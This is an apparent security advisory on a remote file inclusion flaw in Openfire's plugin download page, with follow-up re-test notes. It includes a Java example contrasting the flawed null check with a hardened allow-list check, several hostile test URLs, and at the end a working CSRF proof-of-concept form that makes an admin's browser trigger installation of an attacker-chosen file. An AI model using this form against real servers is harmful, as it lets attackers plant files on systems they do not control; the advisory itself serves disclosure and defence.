hyp3rlinx reported that Openfire v3.10.2 suffers from a Remote File Inclusion (RFI) vulnerability.
In "available-plugins.jsp" the plugin download URL is not validated, so the server can be made to fetch an arbitrary file from any host on the internet.
On line 40, the only condition that must be satisfied is that the parameter is not null. If that check passes, the application downloads whatever URL it is given.
1) Download an arbitrary file, e.g.
The fetched file is then written to the "openfire\plugins" directory.
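To make the gap concrete, here is an added illustration in Java. It is not Openfire's code: the class, the method names, the allow-list and the host "plugins.example.org" are hypothetical. It puts the non-null check described above next to the allow-list check a hardened download path would apply before fetching anything.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Set;

/**
 * Added illustration, not Openfire's code. Contrasts the "parameter is not
 * null" check described in the advisory with an allow-list check on the
 * plugin download URL.
 */
public class PluginUrlCheck {

    // Hypothetical allow-list: an operator would fill this with the host(s)
    // the configured plugin repository is actually served from.
    static final Set<String> ALLOWED_HOSTS = Set.of("plugins.example.org");

    /** The weak check: any non-null value passes, so any URL gets fetched. */
    static boolean weakCheck(String pluginUrl) {
        return pluginUrl != null;
    }

    /**
     * Hardened check: the value must parse as a URL, use https, carry no
     * userinfo, use the default port, point at an allow-listed host and name
     * a .jar file whose last path segment is safe to use as an on-disk name.
     */
    static boolean hardenedCheck(String pluginUrl) {
        if (pluginUrl == null || pluginUrl.isBlank()) return false;
        URI uri;
        try {
            uri = new URI(pluginUrl);
        } catch (URISyntaxException e) {
            return false;
        }
        if (!"https".equalsIgnoreCase(uri.getScheme())) return false;
        // Rejects "https://plugins.example.org@evil.example/x.jar", where the
        // allow-listed name is only the userinfo and the real host is evil.example.
        if (uri.getRawUserInfo() != null) return false;
        if (uri.getPort() != -1) return false;
        String host = uri.getHost();
        if (host == null || !ALLOWED_HOSTS.contains(host.toLowerCase())) return false;
        String path = uri.getPath();              // percent-decoded
        if (path == null || !path.endsWith(".jar")) return false;
        String fileName = path.substring(path.lastIndexOf('/') + 1);
        if (fileName.startsWith(".") || fileName.contains("..") || fileName.contains("\\")) return false;
        return true;
    }

    public static void main(String[] args) {
        String[] samples = {
            "https://plugins.example.org/openfire/example.jar",            // legitimate repository URL
            "https://download.microsoft.com/download/sonar_setup.exe",     // attacker-chosen URL, as in the PoC
            "http://plugins.example.org/openfire/example.jar",             // cleartext: an on-path attacker could swap the jar
            "https://plugins.example.org@evil.example/x.jar",              // userinfo trick
            "https://plugins.example.org/openfire/..%5Cevil.jar",          // encoded backslash in the file name
            null
        };
        for (String s : samples) {
            System.out.printf("%-60s weak=%-5s hardened=%s%n", s, weakCheck(s), hardenedCheck(s));
        }
    }
}
```

The check belongs on the server side wherever the download can be triggered, not only in the JSP that renders the link: the CSRF proof of concept below posts straight to the DWR method that performs the install.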
Re-tested this on the latest Openfire 4.0.0 beta; still present.
Re-tested: this is still present in the 4.1 beta.
Noted there is no CSRF protection on this, so the download of a file to the server can be initiated via CSRF against the admin's browser.
<!-- CSRF PoC - generated by Burp Suite Professional -->
<!-- enctype="text/plain" makes the browser send the field as "name=value" in the body, reproducing the DWR call to downloader.installPlugin with the attacker-chosen URL in c0-param0 -->
<form action="https://192.168.56.103:9091/dwr/exec/downloader.installPlugin.dwr" method="POST" enctype="text/plain">
<input type="hidden" name="callCount" value="1 c0-scriptName=downloader c0-methodName=installPlugin c0-id=576_1481902916818 c0-param0=string:https%3A%2F%2Fdownload.microsoft.com%2Fdownload%2F4%2F4%2F9%2F449b0038-ac27-4b24-bf11-dd8ebdf5cca6%2Fsonar_setup.exe c0-param1=string:1164973806 xml=true " />
<input type="submit" value="Submit request" />
</form>